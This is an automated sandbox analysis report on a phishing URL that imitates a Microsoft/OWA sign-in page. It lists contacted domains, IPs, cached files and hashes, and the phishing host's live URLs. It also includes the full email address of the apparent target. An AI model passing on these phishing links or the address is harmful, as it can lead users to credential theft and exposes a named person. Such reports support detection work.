https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2.js?v=1	0%	URL Reputation	safe
https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2.js?v=1	0%	URL Reputation	safe
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.sv	0%	Avira URL Cloud	safe
https://privacy.micros	0%	URL Reputation	safe
https://privacy.micros	0%	URL Reputation	safe
https://privacy.micros	0%	URL Reputation	safe
https://acctcdn.msauth.net/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1	0%	Avira URL Cloud	safe
https://ch1.amorozon.fr/.zz/?&78387439&user=jon.parr	0%	Avira URL Cloud	safe
https://www.youradchoices.ca	0%	URL Reputation	safe
https://www.youradchoices.ca	0%	URL Reputation	safe
https://www.youradchoices.ca	0%	URL Reputation	safe
https://goips.net/background-redirect/index.php	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg	0%	URL Reputation	safe
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2~	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2~	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2~	0%	URL Reputation	safe
https://signup.live.co	0%	URL Reputation	safe
https://signup.live.co	0%	URL Reputation	safe
https://signup.live.co	0%	URL Reputation	safe
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/Root	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1	0%	URL Reputation	safe
https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1	0%	URL Reputation	safe
https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1	0%	URL Reputation	safe
https://acctcdn.msauth.net/lightweightsignuppackage_oZIcfFtGMdm_yHyDEji_8w2.js?v=1	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2~(	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2~(	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2~(	0%	URL Reputation	safe
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/favicon_a_eupayfgghqiai7k9s	0%	Avira URL Cloud	safe
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://m_post%26redirect_u	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net/converged_ux_v2_RfnRCrmapm3W_OFn994CMA2.css?v=1	0%	Avira URL Cloud	safe
http://fontello.comiconsRegulariconsiconsVersion	0%	URL Reputation	safe
http://fontello.comiconsRegulariconsiconsVersion	0%	URL Reputation	safe
http://fontello.comiconsRegulariconsiconsVersion	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg)	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg)	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg)	0%	URL Reputation	safe
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/r/.zz/908da3c8f209ef75ffb734f6652bf849/	0%	Avira URL Cloud	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2	0%	URL Reputation	safe
https://acctcdn.msauth.net/images/favicon.ico?v=2	0%	URL Reputation	safe
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg	0%	Avira URL Cloud	safe
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png	0%	Avira URL Cloud	safe
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.pn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
goips.net	104.27.129.197	true	false	0%, Virustotal, Browse	unknown
sni1gl.wpc.alphacdn.net	152.199.21.175	true	false	0%, Virustotal, Browse	unknown
ch1.amorozon.fr	170.10.160.34	true	false		unknown
signup.live.com	unknown	unknown	false		high
assets.onestore.ms	unknown	unknown	false		unknown
acctcdn.msauth.net	unknown	unknown	false		unknown
ajax.aspnetcdn.com	unknown	unknown	false		high
client.hip.live.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#path=/mail	true	SlashNext: Fake Login Page type: Phishing & Social Engineering	unknown
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/#	true	SlashNext: Fake Login Page type: Phishing & Social Engineering	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain	~DF7977F7404D051671.TMP.1.dr	false	Avira URL Cloud: safe	unknown
https://signin.kissmetrics.com/privacy/#controls	privacystatement[1].htm.2.dr	false		high
https://login.skype.com/login	privacystatement[1].htm.2.dr	false		high
https://www.acuityads.com/opt-out/	privacystatement[1].htm.2.dr	false		high
http://jquery.org/license	jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr	false		high
https://ch1.amorozon.f	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false	Avira URL Cloud: safe	unknown
https://acctcdn.msauth.net	signup[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.optimizely.com/legal/opt-out/	privacystatement[1].htm.2.dr	false		high
http://sizzlejs.com/	jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr	false		high
https://www.youradchoices.ca/fr	privacystatement[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pVtahKS9WUIZdNqg1DDhHg2.js?v=1	signup[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.asp.net/ajaxlibrary/CDN.ashx.	privacystatement[1].htm.2.dr	false		high
https://signup.live.com/error.aspx?errcode=1045&mkt=en-US	signup[1].htm.2.dr	false		high
http://opensource.org/licenses/mit-license.php)	knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	false		high
http://www.json.org/json2.js	knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	false		high
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.sv	segring[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://www.privacyshield.gov/welcome	privacystatement[1].htm.2.dr	false		high
https://login.microsoftonline.com	sc_login[1].js.2.dr	false		high
https://ondemand.webtrends.com/support/optout.asp	privacystatement[1].htm.2.dr	false		high
https://www.appsflyer.com/optout	privacystatement[1].htm.2.dr	false		high
https://autodiscover.domain.com/owa/#th=/maode%26client_id%3d51483342-085c-	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false		high
https://privacy.micros	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.appnexus.com/	privacystatement[1].htm.2.dr	false		high
https://acctcdn.msauth.net/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1	signup[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://ch1.amorozon.fr/.zz/?&78387439&user=jon.parr	.zz[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://autodiscover.domain.com/owa/$	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false		high
https://www.youradchoices.ca	privacystatement[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://priv-policy.imrworldwide.com/priv/browser/us/en/optout.html	privacystatement[1].htm.2.dr	false		high
http://github.com/requirejs/almond/LICENSE	50-f1e180[1].js.2.dr	false		high
https://www.youronlinechoices.com/	privacystatement[1].htm.2.dr	false		high
https://goips.net/background-redirect/index.php	sc_login[1].js.2.dr	false	Avira URL Cloud: safe	unknown
https://www.here.com/)	privacystatement[1].htm.2.dr	false		high
https://www.aboutads.info/	privacystatement[1].htm.2.dr	false		high
https://www.adjust.com/opt-out/	privacystatement[1].htm.2.dr	false		high
https://www.xbox.com/managedatacollection	privacystatement[1].htm.2.dr	false		high
https://autodiscover.domain.com/owa/	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false		high
https://signup.live.com/	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false		high
https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg	signup[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/	908da3c8f209ef75ffb734f6652bf849[1].htm.2.dr, ~DF7977F7404D051671.TMP.1.dr	false	Avira URL Cloud: safe	unknown
https://acctcdn.msauth.net/images/favicon.ico?v=2~	imagestore.dat.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://developer.yahoo.com/flurry/end-user-opt-out/	privacystatement[1].htm.2.dr	false		high
http://fontello.com	icons[1].eot.2.dr	false		high
https://autodiscover.domain.com/owa/#th=/mail	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false		high
https://signup.live.co	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/Root	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false	Avira URL Cloud: safe	unknown
https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1	signup[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://autodiscover.domain.com/owa/#th=/maRoot	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false		high
https://www.xbox.com	privacystatement[1].htm.2.dr	false		high
http://knockoutjs.com/	knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	false		high
https://acctcdn.msauth.net/lightweightsignuppackage_oZIcfFtGMdm_yHyDEji_8w2.js?v=1	signup[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://ec.europa.eu/info/law/law-topic/data-protection/data-transfers-outside-eu/adequacy-protectio	privacystatement[1].htm.2.dr	false		high
https://github.com/douglascrockford/JSON-js	signup[1].htm.2.dr	false		high
https://www.clicktale.net/disable.html	privacystatement[1].htm.2.dr	false		high
https://acctcdn.msauth.net/images/favicon.ico?v=2~(	imagestore.dat.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/favicon_a_eupayfgghqiai7k9s	imagestore.dat.2.dr	false	Avira URL Cloud: safe	unknown
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://m_post%26redirect_u	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false	Avira URL Cloud: safe	unknown
https://acctcdn.msauth.net/converged_ux_v2_RfnRCrmapm3W_OFn994CMA2.css?v=1	signup[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://www.opensource.org/licenses/mit-license.php)	knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2[1].js.2.dr	false		high
https://autodiscover.domain.com/owa/#path=/mail	908da3c8f209ef75ffb734f6652bf849[1].htm0.2.dr	false		high
http://fontello.comiconsRegulariconsiconsVersion	icons[1].eot.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://acctcdn.msauth.net/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg)	signup[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html	privacystatement[1].htm.2.dr	false		high
https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/r/.zz/908da3c8f209ef75ffb734f6652bf849/	{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat.1.dr	false	Avira URL Cloud: safe	unknown
https://acctcdn.msauth.net/images/favicon.ico?v=2	imagestore.dat.2.dr, signup[1].htm.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.xbox.com/	privacystatement[1].htm.2.dr	false		high
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg	segring[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png	segring[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css	app[1].css.2.dr	false		high
https://www.linkedin.com/legal/privacy-policy	privacystatement[1].htm.2.dr	false		high
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.pn	segring[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
http://jquery.com/	jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr	false		high
https://support.xbox.com/help/friends-social-activity/community/use-safety-settings	privacystatement[1].htm.2.dr	false		high
https://www.xbox.com/Legal/ThirdPartyDataSharing	privacystatement[1].htm.2.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
170.10.160.34	unknown	United States	32748	STEADFASTUS	false
104.27.129.197	unknown	United States	13335	CLOUDFLARENETUS	false
152.199.21.175	unknown	United States	15133	EDGECASTUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323890
Start date:	27.11.2020
Start time:	18:43:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://ch1.amorozon.fr/.zz?&78387439&user=jon.parr@syngenta.com
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.win@3/52@8/3
Cookbook Comments:	Adjust boot time Enable AMSI Browsing link: https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/segring.php?https://autodiscover.domain.com/owa/# Browsing link: https://login.live.com/oauth20_authorize.srf?response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&scope=openid+profile+email+offline_access&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2&state=rQIIAXVSPW_TUADMS9rQVAiqCgkWRAfEgOT42S-240gVavPROk3s5tNxlshxnMRx_OzYr7HsjY2xE0gZGGBA6sgELOydOvcXICbUCSSQSNlZbri74XR3z1NMlik8zaEcpwtDkRJ1HlE5kYGUnmN5CnGIRyxkRhxE_u72zpP56_nv9GP5Tevl5-DrnxcrkBnMraWZNVznAjycEuIFBZoOwzDrjseW8U-gPwFwBcA3AFbJTRNTndZFMuARL7ICQqKQzwl5huHZrKxWLKXUteV2mcglA8kRhFrctGrtCac5daLNunZ_1rS1uIzkkhT1VS2qtxuh7Kz97JqzIFSO6lytPbe1WZ3IR41YjitTWW3O-qUOvE7eVw7OyJS9Bde3YvMmmRm7vjPw3ICsUh-A4plYGhVdjE2DZG9tJiaWoRPLxae-65k-scxgv1sblnS1s_D5PF8kRWPYOun5Esc2Wlg-XjJzL6ZqC7w8VYxpjI6lw2V1MfHqZ4I9HWgN2zxWqlK8mGHKODNweOJo1ajnTxpmxPtlUlJqnZHl2-64q2oBqjUbJyE6jQ4HXfZAHBUVP6pQH1Ppda2Oiy9T99ahsDXa83x3bM3Nqw3wfeMuTBW2trZ3Eo8Se4mfG-Dd5nq5VP3X4Fm8W35v47c3sZC43KTbeUGhXaZChx5L94YLL2BYWirrejevdnhabQei5AiBaArlfbbAnKfBeTr9Iw1e3Ul8yfxv6-vtB-u_iBTkKMjvMbAA-QLi-n8B0&estsfed=1&uaid=6c966c1f06fc4e1d975381b973bffd3f&signup=1&lw=1&fl=easi2&fci=4345a7b9-9a63-4910-a426-35363201d503&mkt=en-US Browsing link: https://privacy.microsoft.com/en-US/privacystatement
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, ielowutil.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.64.90.137, 104.108.39.131, 172.217.168.42, 40.90.23.206, 40.90.23.154, 40.90.137.124, 13.104.215.72, 13.104.215.69, 40.90.137.126, 40.90.137.127, 40.90.137.120, 13.107.42.22, 20.190.137.78, 20.190.137.1, 20.190.137.64, 40.126.9.98, 52.114.74.44, 92.122.145.53, 152.199.19.160, 92.122.213.194, 92.122.213.240, 104.84.57.181, 104.108.38.107, 92.122.213.247, 152.199.19.161 Excluded domains from analysis (whitelisted): assets.onestore.ms.edgekey.net, browser.events.data.trafficmanager.net, blu-main-ips-v4only.b.lg.prod.aadmsa.trafficmanager.net, i.s-microsoft.com, i.s-microsoft.com.edgekey.net, a1449.dscg2.akamai.net, acctcdn.trafficmanager.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, a1945.g2.akamai.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, ams2.b.f.prd.aadg.trafficmanager.net, mscomajax.vo.msecnd.net, login.live.com, statics-marketingsites-eus-ms-com.akamaized.net, watson.telemetry.microsoft.com, acctcdnvzeuno.azureedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolweu03.cloudapp.net, acctcdnvzeuno.ec.azureedge.net, e10583.dspg.akamaiedge.net, skypedataprdcolwus17.cloudapp.net, ajax.googleapis.com, cs22.wpc.v0cdn.net, ie9comview.vo.msecnd.net, assets.onestore.ms.akadns.net, login.msa.msidentity.com, c-s.cms.ms.akadns.net, skypedataprdcoleus17.cloudapp.net, browser.events.data.microsoft.com, c.s-microsoft.com, www.tm.f.prd.aadg.trafficmanager.net, privacy.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, account.msa.akadns6.net, l-0013.l-msedge.net, c.s-microsoft.com-c.edgekey.net, e13678.dscg.akamaiedge.net, privacy.microsoft.com.edgekey.net, e13678.dspb.akamaiedge.net, www.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, cs9.wpc.v0cdn.net Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{32E83693-30D8-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	30296
Entropy (8bit):	1.8538773329357718
Encrypted:	false
SSDEEP:	192:rYZrZGJ2Gq19WGq4XtGq4KcifGq4K33SozMGq47+33lABGq47338GDGq473c39s/:rY9/RUoHAJS08X
MD5:	C50540A8CBDE2B3056E0640B4C7DBAB4
SHA1:	E3249891019C6327668F0971EA8ECADE12417EF8
SHA-256:	4C96B35ED9C6C30A488D8B5E78FF5E125CA107B0A9F6158698359AE34C18E091
SHA-512:	038E1D3050A9D0E1962FADB8F4731D9B6D176A558508DE7F1C0503FF818A086EDF437EE861F4D3A822AF33F52A96E1BF8F7AC739FA92EC057CB4F7AC1060D38A
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{32E83695-30D8-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	98040
Entropy (8bit):	3.135636695065447
Encrypted:	false
SSDEEP:	384:rV1bH+hgMMgiagZg72iBiVMiqi8iZQirvuDvieEkmiKniRGjuDYxvuDvPHvuDv2j:CURv4HHGjjv4Pv42v4sv4NGjEGjqv4r
MD5:	273B171863B63E56A3C1BB1506B584E9
SHA1:	1E96893BD9CC11E54D55AC9A3462FC7D37B95384
SHA-256:	F7C81AB646F8C8C1408D30498AEAB104CE0AABC7EB81AFB7868BA94EFCEE712A
SHA-512:	A07EF4078B897D071C89E137B230A5BEBB55AAC722969E742143BF8C0520AEBAE6B136BE294F8573A37ECBB2DE9103C48662CFF0749A5FB77FC94FD73D24ED91
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{39B7F450-30D8-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5670145754378717
Encrypted:	false
SSDEEP:	48:IwsjGcprtGwpaMjG4pQIGrapbSEXrGQpKLG7HpRBsTGIpG:rsZ3Qo6WBSEXFAKTB4A
MD5:	BFA28C9CBF9B756E2829EAFA01F1B0C4
SHA1:	DA1AD7600D89AF0295BD6AA4EBC056FE21A9AD4D
SHA-256:	C013D5069510090187489F7A065BCFD3E4D828EA4E99EEFC3C24D30CB97F336D
SHA-512:	1EB64DB23E26352A9AA10D3778ED561A0BBC7528C68D76AE92357734E8E6010888705E51220E381995FD6D4C06461999E2F876C83615AF75BC76A7E571A76911
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	54684
Entropy (8bit):	3.104189669915587
Encrypted:	false
SSDEEP:	48:NcS7cS6cSycSqgyyyyyyyyyyyyy8cSI5cSJQQQQQcO/xO/AO/YO/bgyyyyyyyyyc:p/OGXuJQQQQQkQQQQQ8QQQQQ5
MD5:	AEDB27E50A569ECEF139C8EC426B9358
SHA1:	CB8E1E84871849B4F3D8CCA589C8137C64ACF032
SHA-256:	346B0F01A5E46F20926CDCEFCB9004BD42D30BC55B86DD37B04949F1BF6D4D1C
SHA-512:	4369F0E7EDBF4FE08E9C8F86C8E3FB0463687EBAB92CDAD81E0BB84F331E191616315820F3B8DC2A052232E22AFF031F970CF3846A887AF948840FDB6086094D
Malicious:	false
Reputation:	low
Preview:	n.h.t.t.p.s.:././.c.h.1...a.m.o.r.o.z.o.n...f.r./...z.z./.9.0.8.d.a.3.c.8.f.2.0.9.e.f.7.5.f.f.b.7.3.4.f.6.6.5.2.b.f.8.4.9./.i.n.c.l.u.d.e./.s.r.c./.f.a.v.i.c.o.n._.a._.e.u.p.a.y.f.g.g.h.q.i.a.i.7.k.9.s.o.l.6.l.g.2...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\.zz[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	281
Entropy (8bit):	5.330246860261914
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPP3gGI0QWLPQ6W6Xw+KqD:J0+ox0RJWWPP40QW7BDT
MD5:	4BF08189C7D046F5A300A92AF1FE1FA1
SHA1:	5342287176AB7AE5A05505BAF317C8697845F78E
SHA-256:	477ED2868A0933304922E8FC358EC2C5F15B8A146F7ADAE5F794998EA7E47412
SHA-512:	99211E3CB991FEE77DF8B75416BF5E214A50FAC9C5426226577EBF3A50DB7C7DC6572167D81A6B30BD5746DC63A215877E96C23E36DDF5CCABEB1F5F78860948
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://ch1.amorozon.fr/.zz/?&78387439&user=jon.parr@syngenta.com">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x28, frames 3
Category:	downloaded
Size (bytes):	3006
Entropy (8bit):	3.009694812062996
Encrypted:	false
SSDEEP:	12:tWK1TbpOMo7FL2cDPilY1Qtc150XyoseAfQx9Jq4U3DXCFSAt78aULgf5GY48:AK1hNo7FCWwNtc1spAYx9VOCUiXVf5x
MD5:	138BCEE624FA04EF9B75E86211A9FE0D
SHA1:	23BBCDAAEBD6C9A6E57E96E44493B2212860FCAB
SHA-256:	F89E908280791803BBF1F33B596FF4A2179B355A8E15AD02EBAA2B1DA11127EA
SHA-512:	D20765E5738F4AC5A91396B5F5D88057C3B5125840BCE42039AC9D5D75B1C3FB9629ACA6290A475625DFE60887CF59D4FB52108D024FF4FA8094C9B8458F9F33
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/0-small_138bcee624fa04ef9b75e86211a9fe0d.jpg
Preview:	......JFIF.....H.H.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Mic_BG[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, baseline, precision 8, 1920x1080, frames 3
Category:	downloaded
Size (bytes):	283351
Entropy (8bit):	7.975896455873056
Encrypted:	false
SSDEEP:	6144:hPgRhluS12CyK8XGsLzsr5XONnQ4/bEmhZSIj6xU2zyOX/:2vz1pyWsLoXqN/YWPUU2OOX/
MD5:	A5DBD4393FF6A725C7E62B61DF7E72F0
SHA1:	55B292F885FFC92ABCE18750B07AA4ACFA4E903E
SHA-256:	211A907DE2DA0FF4A0E90917AC8054E2F35C351180977550C26E51B4909F2BEB
SHA-512:	850586A05B67EF25492BD50A090F1EC0A0CC21DC4E4EFEB35E19CDC78A98F9415A3807318FA02664EADE87F0E2D8FA2A2958CD0D712329800FC05689E01DC614
Malicious:	false
Reputation:	low
IE Cache URL:	https://ch1.amorozon.fr/.zz/908da3c8f209ef75ffb734f6652bf849/include/src/Mic_BG.jpg
